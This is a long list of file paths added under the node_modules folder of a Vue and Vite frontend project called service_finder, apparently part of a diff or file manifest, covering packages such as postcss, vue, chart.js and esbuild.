+/opt/service_finder/frontend/node_modules/postcss/lib/postcss.js +/opt/service_finder/frontend/node_modules/postcss/lib/postcss.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/css-syntax-error.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/input.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/symbols.js +/opt/service_finder/frontend/node_modules/postcss/lib/at-rule.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/warn-once.js +/opt/service_finder/frontend/node_modules/postcss/lib/document.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/input.js +/opt/service_finder/frontend/node_modules/postcss/lib/rule.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/result.js +/opt/service_finder/frontend/node_modules/postcss/lib/map-generator.js +/opt/service_finder/frontend/node_modules/postcss/lib/list.js +/opt/service_finder/frontend/node_modules/postcss/lib/comment.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/parse.js +/opt/service_finder/frontend/node_modules/postcss/lib/warning.js +/opt/service_finder/frontend/node_modules/postcss/lib/lazy-result.js +/opt/service_finder/frontend/node_modules/postcss/lib/parse.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/root.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/processor.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/no-work-result.js +/opt/service_finder/frontend/node_modules/postcss/lib/node.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/declaration.js +/opt/service_finder/frontend/node_modules/postcss/lib/comment.js +/opt/service_finder/frontend/node_modules/postcss/lib/postcss.mjs +/opt/service_finder/frontend/node_modules/postcss/lib/container.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/parser.js +/opt/service_finder/frontend/node_modules/postcss/lib/list.d.ts +/opt/service_finder/frontend/node_modules/postcss/lib/root.js +/opt/service_finder/frontend/node_modules/postcss/lib/css-syntax-error.js +/opt/service_finder/frontend/node_modules/postcss/lib/postcss.d.mts +/opt/service_finder/frontend/node_modules/postcss/package.json +/opt/service_finder/frontend/node_modules/postcss/LICENSE +/opt/service_finder/frontend/node_modules/postcss/README.md +/opt/service_finder/frontend/node_modules/speakingurl +/opt/service_finder/frontend/node_modules/speakingurl/bower.json +/opt/service_finder/frontend/node_modules/speakingurl/examples +/opt/service_finder/frontend/node_modules/speakingurl/examples/node-example.js +/opt/service_finder/frontend/node_modules/speakingurl/examples/browser-example.html +/opt/service_finder/frontend/node_modules/speakingurl/test +/opt/service_finder/frontend/node_modules/speakingurl/test/test-dhivehi.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-language.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-georgien.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-arabic.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-titlecase.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-accent.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-persian.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-lang.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-hungarian.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-maintaincase.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-truncate.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-rfc3986.js +/opt/service_finder/frontend/node_modules/speakingurl/test/mocha.opts +/opt/service_finder/frontend/node_modules/speakingurl/test/test-speakingurl.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-separator.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-cyrillic.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-create.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-symbols.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-burmese.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-custom.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-defaults.js +/opt/service_finder/frontend/node_modules/speakingurl/test/test-turkish.js +/opt/service_finder/frontend/node_modules/speakingurl/.jshintrc +/opt/service_finder/frontend/node_modules/speakingurl/.travis.yml +/opt/service_finder/frontend/node_modules/speakingurl/lib +/opt/service_finder/frontend/node_modules/speakingurl/lib/speakingurl.js +/opt/service_finder/frontend/node_modules/speakingurl/lib/speakingurl-rails.rb +/opt/service_finder/frontend/node_modules/speakingurl/package.json +/opt/service_finder/frontend/node_modules/speakingurl/component.json +/opt/service_finder/frontend/node_modules/speakingurl/LICENSE +/opt/service_finder/frontend/node_modules/speakingurl/.jshintignore +/opt/service_finder/frontend/node_modules/speakingurl/index.js +/opt/service_finder/frontend/node_modules/speakingurl/Gulpfile.js +/opt/service_finder/frontend/node_modules/speakingurl/README.md +/opt/service_finder/frontend/node_modules/speakingurl/speakingurl-rails.gemspec +/opt/service_finder/frontend/node_modules/speakingurl/.editorconfig +/opt/service_finder/frontend/node_modules/speakingurl/.npmignore +/opt/service_finder/frontend/node_modules/speakingurl/.jsbeautifyrc +/opt/service_finder/frontend/node_modules/speakingurl/CHANGELOG.md +/opt/service_finder/frontend/node_modules/speakingurl/Makefile +/opt/service_finder/frontend/node_modules/speakingurl/speakingurl.min.js +/opt/service_finder/frontend/node_modules/speakingurl/typings +/opt/service_finder/frontend/node_modules/speakingurl/typings/speakingurl +/opt/service_finder/frontend/node_modules/speakingurl/typings/speakingurl/speakingurl.d.ts +/opt/service_finder/frontend/node_modules/fraction.js +/opt/service_finder/frontend/node_modules/fraction.js/src +/opt/service_finder/frontend/node_modules/fraction.js/src/fraction.js +/opt/service_finder/frontend/node_modules/fraction.js/examples +/opt/service_finder/frontend/node_modules/fraction.js/examples/angles.js +/opt/service_finder/frontend/node_modules/fraction.js/examples/hesse-convergence.js +/opt/service_finder/frontend/node_modules/fraction.js/examples/approx.js +/opt/service_finder/frontend/node_modules/fraction.js/examples/toFraction.js +/opt/service_finder/frontend/node_modules/fraction.js/examples/tape-measure.js +/opt/service_finder/frontend/node_modules/fraction.js/examples/ratio-chain.js +/opt/service_finder/frontend/node_modules/fraction.js/examples/valueOfPi.js +/opt/service_finder/frontend/node_modules/fraction.js/examples/egyptian.js +/opt/service_finder/frontend/node_modules/fraction.js/examples/integrate.js +/opt/service_finder/frontend/node_modules/fraction.js/examples/rational-pow.js +/opt/service_finder/frontend/node_modules/fraction.js/fraction.d.ts +/opt/service_finder/frontend/node_modules/fraction.js/fraction.d.mts +/opt/service_finder/frontend/node_modules/fraction.js/package.json +/opt/service_finder/frontend/node_modules/fraction.js/dist +/opt/service_finder/frontend/node_modules/fraction.js/dist/fraction.js +/opt/service_finder/frontend/node_modules/fraction.js/dist/fraction.mjs +/opt/service_finder/frontend/node_modules/fraction.js/dist/fraction.min.js +/opt/service_finder/frontend/node_modules/fraction.js/LICENSE +/opt/service_finder/frontend/node_modules/fraction.js/tests +/opt/service_finder/frontend/node_modules/fraction.js/tests/fraction.test.js +/opt/service_finder/frontend/node_modules/fraction.js/README.md +/opt/service_finder/frontend/node_modules/fraction.js/CHANGELOG.md +/opt/service_finder/frontend/node_modules/ast-kit +/opt/service_finder/frontend/node_modules/ast-kit/package.json +/opt/service_finder/frontend/node_modules/ast-kit/dist +/opt/service_finder/frontend/node_modules/ast-kit/dist/index.d.ts +/opt/service_finder/frontend/node_modules/ast-kit/dist/index.js +/opt/service_finder/frontend/node_modules/ast-kit/LICENSE +/opt/service_finder/frontend/node_modules/ast-kit/README.md +/opt/service_finder/frontend/node_modules/get-proto +/opt/service_finder/frontend/node_modules/get-proto/index.d.ts +/opt/service_finder/frontend/node_modules/get-proto/test +/opt/service_finder/frontend/node_modules/get-proto/test/index.js +/opt/service_finder/frontend/node_modules/get-proto/tsconfig.json +/opt/service_finder/frontend/node_modules/get-proto/package.json +/opt/service_finder/frontend/node_modules/get-proto/Reflect.getPrototypeOf.d.ts +/opt/service_finder/frontend/node_modules/get-proto/.github +/opt/service_finder/frontend/node_modules/get-proto/.github/FUNDING.yml +/opt/service_finder/frontend/node_modules/get-proto/.eslintrc +/opt/service_finder/frontend/node_modules/get-proto/LICENSE +/opt/service_finder/frontend/node_modules/get-proto/index.js +/opt/service_finder/frontend/node_modules/get-proto/Reflect.getPrototypeOf.js +/opt/service_finder/frontend/node_modules/get-proto/Object.getPrototypeOf.js +/opt/service_finder/frontend/node_modules/get-proto/.nycrc +/opt/service_finder/frontend/node_modules/get-proto/README.md +/opt/service_finder/frontend/node_modules/get-proto/Object.getPrototypeOf.d.ts +/opt/service_finder/frontend/node_modules/get-proto/CHANGELOG.md +/opt/service_finder/frontend/node_modules/.bin +/opt/service_finder/frontend/node_modules/.bin/jsesc +/opt/service_finder/frontend/node_modules/.bin/parser +/opt/service_finder/frontend/node_modules/.bin/browserslist +/opt/service_finder/frontend/node_modules/.bin/autoprefixer +/opt/service_finder/frontend/node_modules/.bin/acorn +/opt/service_finder/frontend/node_modules/.bin/jiti +/opt/service_finder/frontend/node_modules/.bin/baseline-browser-mapping +/opt/service_finder/frontend/node_modules/.bin/json5 +/opt/service_finder/frontend/node_modules/.bin/yaml +/opt/service_finder/frontend/node_modules/.bin/update-browserslist-db +/opt/service_finder/frontend/node_modules/.bin/esbuild +/opt/service_finder/frontend/node_modules/.bin/nanoid +/opt/service_finder/frontend/node_modules/.bin/rollup +/opt/service_finder/frontend/node_modules/.bin/vite +/opt/service_finder/frontend/node_modules/es-object-atoms +/opt/service_finder/frontend/node_modules/es-object-atoms/index.d.ts +/opt/service_finder/frontend/node_modules/es-object-atoms/isObject.js +/opt/service_finder/frontend/node_modules/es-object-atoms/ToObject.d.ts +/opt/service_finder/frontend/node_modules/es-object-atoms/test +/opt/service_finder/frontend/node_modules/es-object-atoms/test/index.js +/opt/service_finder/frontend/node_modules/es-object-atoms/tsconfig.json +/opt/service_finder/frontend/node_modules/es-object-atoms/RequireObjectCoercible.js +/opt/service_finder/frontend/node_modules/es-object-atoms/package.json +/opt/service_finder/frontend/node_modules/es-object-atoms/RequireObjectCoercible.d.ts +/opt/service_finder/frontend/node_modules/es-object-atoms/isObject.d.ts +/opt/service_finder/frontend/node_modules/es-object-atoms/.github +/opt/service_finder/frontend/node_modules/es-object-atoms/.github/FUNDING.yml +/opt/service_finder/frontend/node_modules/es-object-atoms/.eslintrc +/opt/service_finder/frontend/node_modules/es-object-atoms/LICENSE +/opt/service_finder/frontend/node_modules/es-object-atoms/index.js +/opt/service_finder/frontend/node_modules/es-object-atoms/ToObject.js +/opt/service_finder/frontend/node_modules/es-object-atoms/README.md +/opt/service_finder/frontend/node_modules/es-object-atoms/CHANGELOG.md +/opt/service_finder/frontend/node_modules/pathe +/opt/service_finder/frontend/node_modules/pathe/package.json +/opt/service_finder/frontend/node_modules/pathe/dist +/opt/service_finder/frontend/node_modules/pathe/dist/shared +/opt/service_finder/frontend/node_modules/pathe/dist/shared/pathe.BSlhyZSM.cjs +/opt/service_finder/frontend/node_modules/pathe/dist/shared/pathe.M-eThtNZ.mjs +/opt/service_finder/frontend/node_modules/pathe/dist/utils.mjs +/opt/service_finder/frontend/node_modules/pathe/dist/index.d.ts +/opt/service_finder/frontend/node_modules/pathe/dist/index.cjs +/opt/service_finder/frontend/node_modules/pathe/dist/utils.d.mts +/opt/service_finder/frontend/node_modules/pathe/dist/utils.cjs +/opt/service_finder/frontend/node_modules/pathe/dist/utils.d.cts +/opt/service_finder/frontend/node_modules/pathe/dist/utils.d.ts +/opt/service_finder/frontend/node_modules/pathe/dist/index.d.mts +/opt/service_finder/frontend/node_modules/pathe/dist/index.d.cts +/opt/service_finder/frontend/node_modules/pathe/dist/index.mjs +/opt/service_finder/frontend/node_modules/pathe/LICENSE +/opt/service_finder/frontend/node_modules/pathe/utils.d.ts +/opt/service_finder/frontend/node_modules/pathe/README.md +/opt/service_finder/frontend/node_modules/source-map-js +/opt/service_finder/frontend/node_modules/source-map-js/source-map.d.ts +/opt/service_finder/frontend/node_modules/source-map-js/lib +/opt/service_finder/frontend/node_modules/source-map-js/lib/source-map-consumer.d.ts +/opt/service_finder/frontend/node_modules/source-map-js/lib/array-set.js +/opt/service_finder/frontend/node_modules/source-map-js/lib/source-map-generator.js +/opt/service_finder/frontend/node_modules/source-map-js/lib/mapping-list.js +/opt/service_finder/frontend/node_modules/source-map-js/lib/base64-vlq.js +/opt/service_finder/frontend/node_modules/source-map-js/lib/source-map-generator.d.ts +/opt/service_finder/frontend/node_modules/source-map-js/lib/base64.js +/opt/service_finder/frontend/node_modules/source-map-js/lib/source-node.js +/opt/service_finder/frontend/node_modules/source-map-js/lib/util.js +/opt/service_finder/frontend/node_modules/source-map-js/lib/source-map-consumer.js +/opt/service_finder/frontend/node_modules/source-map-js/lib/quick-sort.js +/opt/service_finder/frontend/node_modules/source-map-js/lib/source-node.d.ts +/opt/service_finder/frontend/node_modules/source-map-js/lib/binary-search.js +/opt/service_finder/frontend/node_modules/source-map-js/package.json +/opt/service_finder/frontend/node_modules/source-map-js/source-map.js +/opt/service_finder/frontend/node_modules/source-map-js/LICENSE +/opt/service_finder/frontend/node_modules/source-map-js/README.md +/opt/service_finder/frontend/node_modules/@esbuild +/opt/service_finder/frontend/node_modules/@esbuild/linux-x64 +/opt/service_finder/frontend/node_modules/@esbuild/linux-x64/package.json +/opt/service_finder/frontend/node_modules/@esbuild/linux-x64/bin +/opt/service_finder/frontend/node_modules/@esbuild/linux-x64/bin/esbuild +/opt/service_finder/frontend/node_modules/@esbuild/linux-x64/README.md +/opt/service_finder/frontend/node_modules/@rolldown +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/package.json +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/simple-filters.d.ts +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/filter-vite-plugins.js +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/composable-filters.js +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/filter-vite-plugins.d.ts +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/index.d.ts +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/composable-filters.d.ts +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/utils.js +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/simple-filters.js +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/utils.d.ts +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/dist/index.js +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/LICENSE +/opt/service_finder/frontend/node_modules/@rolldown/pluginutils/README.md +/opt/service_finder/frontend/node_modules/vue +/opt/service_finder/frontend/node_modules/vue/compiler-sfc +/opt/service_finder/frontend/node_modules/vue/compiler-sfc/index.d.ts +/opt/service_finder/frontend/node_modules/vue/compiler-sfc/index.browser.js +/opt/service_finder/frontend/node_modules/vue/compiler-sfc/index.browser.mjs +/opt/service_finder/frontend/node_modules/vue/compiler-sfc/package.json +/opt/service_finder/frontend/node_modules/vue/compiler-sfc/index.js +/opt/service_finder/frontend/node_modules/vue/compiler-sfc/register-ts.js +/opt/service_finder/frontend/node_modules/vue/compiler-sfc/index.d.mts +/opt/service_finder/frontend/node_modules/vue/compiler-sfc/index.mjs +/opt/service_finder/frontend/node_modules/vue/package.json +/opt/service_finder/frontend/node_modules/vue/dist +/opt/service_finder/frontend/node_modules/vue/dist/vue.esm-browser.prod.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.d.mts +/opt/service_finder/frontend/node_modules/vue/dist/vue.cjs.prod.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.global.prod.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.cjs.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.d.ts +/opt/service_finder/frontend/node_modules/vue/dist/vue.global.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.runtime.esm-browser.prod.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.runtime.global.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.runtime.esm-bundler.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.esm-browser.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.runtime.global.prod.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.runtime.esm-browser.js +/opt/service_finder/frontend/node_modules/vue/dist/vue.esm-bundler.js +/opt/service_finder/frontend/node_modules/vue/server-renderer +/opt/service_finder/frontend/node_modules/vue/server-renderer/index.d.ts +/opt/service_finder/frontend/node_modules/vue/server-renderer/package.json +/opt/service_finder/frontend/node_modules/vue/server-renderer/index.js +/opt/service_finder/frontend/node_modules/vue/server-renderer/index.d.mts +/opt/service_finder/frontend/node_modules/vue/server-renderer/index.mjs +/opt/service_finder/frontend/node_modules/vue/LICENSE +/opt/service_finder/frontend/node_modules/vue/index.js +/opt/service_finder/frontend/node_modules/vue/jsx.d.ts +/opt/service_finder/frontend/node_modules/vue/jsx-runtime +/opt/service_finder/frontend/node_modules/vue/jsx-runtime/index.d.ts +/opt/service_finder/frontend/node_modules/vue/jsx-runtime/package.json +/opt/service_finder/frontend/node_modules/vue/jsx-runtime/index.js +/opt/service_finder/frontend/node_modules/vue/jsx-runtime/index.mjs +/opt/service_finder/frontend/node_modules/vue/README.md +/opt/service_finder/frontend/node_modules/vue/index.mjs +/opt/service_finder/frontend/node_modules/delayed-stream +/opt/service_finder/frontend/node_modules/delayed-stream/License +/opt/service_finder/frontend/node_modules/delayed-stream/lib +/opt/service_finder/frontend/node_modules/delayed-stream/lib/delayed_stream.js +/opt/service_finder/frontend/node_modules/delayed-stream/package.json +/opt/service_finder/frontend/node_modules/delayed-stream/Readme.md +/opt/service_finder/frontend/node_modules/delayed-stream/.npmignore +/opt/service_finder/frontend/node_modules/delayed-stream/Makefile +/opt/service_finder/frontend/node_modules/lightningcss-linux-x64-gnu +/opt/service_finder/frontend/node_modules/lightningcss-linux-x64-gnu/package.json +/opt/service_finder/frontend/node_modules/lightningcss-linux-x64-gnu/lightningcss.linux-x64-gnu.node +/opt/service_finder/frontend/node_modules/lightningcss-linux-x64-gnu/LICENSE +/opt/service_finder/frontend/node_modules/lightningcss-linux-x64-gnu/README.md +/opt/service_finder/frontend/node_modules/magic-string +/opt/service_finder/frontend/node_modules/magic-string/package.json +/opt/service_finder/frontend/node_modules/magic-string/dist +/opt/service_finder/frontend/node_modules/magic-string/dist/magic-string.es.mjs.map +/opt/service_finder/frontend/node_modules/magic-string/dist/magic-string.es.d.mts +/opt/service_finder/frontend/node_modules/magic-string/dist/magic-string.es.mjs +/opt/service_finder/frontend/node_modules/magic-string/dist/magic-string.umd.js +/opt/service_finder/frontend/node_modules/magic-string/dist/magic-string.cjs.js.map +/opt/service_finder/frontend/node_modules/magic-string/dist/magic-string.cjs.js +/opt/service_finder/frontend/node_modules/magic-string/dist/magic-string.umd.js.map +/opt/service_finder/frontend/node_modules/magic-string/dist/magic-string.cjs.d.ts +/opt/service_finder/frontend/node_modules/magic-string/LICENSE +/opt/service_finder/frontend/node_modules/magic-string/README.md +/opt/service_finder/frontend/node_modules/es-define-property +/opt/service_finder/frontend/node_modules/es-define-property/index.d.ts +/opt/service_finder/frontend/node_modules/es-define-property/test +/opt/service_finder/frontend/node_modules/es-define-property/test/index.js +/opt/service_finder/frontend/node_modules/es-define-property/tsconfig.json +/opt/service_finder/frontend/node_modules/es-define-property/package.json +/opt/service_finder/frontend/node_modules/es-define-property/.github +/opt/service_finder/frontend/node_modules/es-define-property/.github/FUNDING.yml +/opt/service_finder/frontend/node_modules/es-define-property/.eslintrc +/opt/service_finder/frontend/node_modules/es-define-property/LICENSE +/opt/service_finder/frontend/node_modules/es-define-property/index.js +/opt/service_finder/frontend/node_modules/es-define-property/.nycrc +/opt/service_finder/frontend/node_modules/es-define-property/README.md +/opt/service_finder/frontend/node_modules/es-define-property/CHANGELOG.md +/opt/service_finder/frontend/node_modules/chart.js +/opt/service_finder/frontend/node_modules/chart.js/package.json +/opt/service_finder/frontend/node_modules/chart.js/dist +/opt/service_finder/frontend/node_modules/chart.js/dist/index.umd.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.colors.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.title.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.legend.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.filler +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.filler/filler.drawing.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.filler/filler.helper.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.filler/filler.options.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.filler/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.filler/filler.target.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.filler/filler.target.stack.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.filler/filler.segment.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.filler/simpleArc.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.tooltip.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.subtitle.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/plugins/plugin.decimation.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/chart.umd.min.js.map +/opt/service_finder/frontend/node_modules/chart.js/dist/core +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.scale.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.adapters.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.datasetController.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.typedRegistry.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.controller.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.scale.autoskip.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.animator.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.defaults.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.ticks.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.registry.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.scale.defaults.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.animation.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.interaction.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.animations.defaults.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.plugins.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.config.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.element.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.layouts.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.animations.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/core/core.layouts.defaults.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/chart.js.map +/opt/service_finder/frontend/node_modules/chart.js/dist/chart.umd.js +/opt/service_finder/frontend/node_modules/chart.js/dist/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/chart.js +/opt/service_finder/frontend/node_modules/chart.js/dist/chart.umd.js.map +/opt/service_finder/frontend/node_modules/chart.js/dist/platform +/opt/service_finder/frontend/node_modules/chart.js/dist/platform/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/platform/platform.basic.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/platform/platform.dom.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/platform/platform.base.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/types +/opt/service_finder/frontend/node_modules/chart.js/dist/types/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/types/animation.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/types/layout.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/types/color.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/types/geometric.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/types/basic.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/types/utils.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/types.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers.cjs +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers/controller.line.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers/controller.radar.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers/controller.pie.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers/controller.doughnut.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers/controller.scatter.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers/controller.bubble.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers/controller.polarArea.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/controllers/controller.bar.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.intl.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.curve.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.dataset.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.core.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.collection.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.dom.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.math.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.rtl.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.interpolation.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.options.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.easing.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.config.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.extras.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.config.types.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.color.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.segment.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers/helpers.canvas.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/chart.umd.min.js +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers.js +/opt/service_finder/frontend/node_modules/chart.js/dist/chart.cjs +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers.js.map +/opt/service_finder/frontend/node_modules/chart.js/dist/elements +/opt/service_finder/frontend/node_modules/chart.js/dist/elements/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/elements/element.bar.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/elements/element.line.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/elements/element.point.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/elements/element.arc.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/chunks +/opt/service_finder/frontend/node_modules/chart.js/dist/chunks/helpers.dataset.js.map +/opt/service_finder/frontend/node_modules/chart.js/dist/chunks/helpers.dataset.cjs.map +/opt/service_finder/frontend/node_modules/chart.js/dist/chunks/helpers.dataset.cjs +/opt/service_finder/frontend/node_modules/chart.js/dist/chunks/helpers.dataset.js +/opt/service_finder/frontend/node_modules/chart.js/dist/scales +/opt/service_finder/frontend/node_modules/chart.js/dist/scales/index.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/scales/scale.logarithmic.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/scales/scale.linear.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/scales/scale.radialLinear.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/scales/scale.time.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/scales/scale.timeseries.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/scales/scale.category.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/scales/scale.linearbase.d.ts +/opt/service_finder/frontend/node_modules/chart.js/dist/helpers.cjs.map +/opt/service_finder/frontend/node_modules/chart.js/dist/chart.cjs.map +/opt/service_finder/frontend/node_modules/chart.js/helpers +/opt/service_finder/frontend/node_modules/chart.js/helpers/helpers.cjs +/opt/service_finder/frontend/node_modules/chart.js/helpers/package.json +/opt/service_finder/frontend/node_modules/chart.js/helpers/helpers.d.ts +/opt/service_finder/frontend/node_modules/chart.js/helpers/helpers.js +/opt/service_finder/frontend/node_modules/chart.js/LICENSE.md +/opt/service_finder/frontend/node_modules/chart.js/README.md +/opt/service_finder/frontend/node_modules/chart.js/auto +/opt/service_finder/frontend/node_modules/chart.js/auto/package.json +/opt/service_finder/frontend/node_modules/chart.js/auto/auto.d.ts +/opt/service_finder/frontend/node_modules/chart.js/auto/auto.cjs 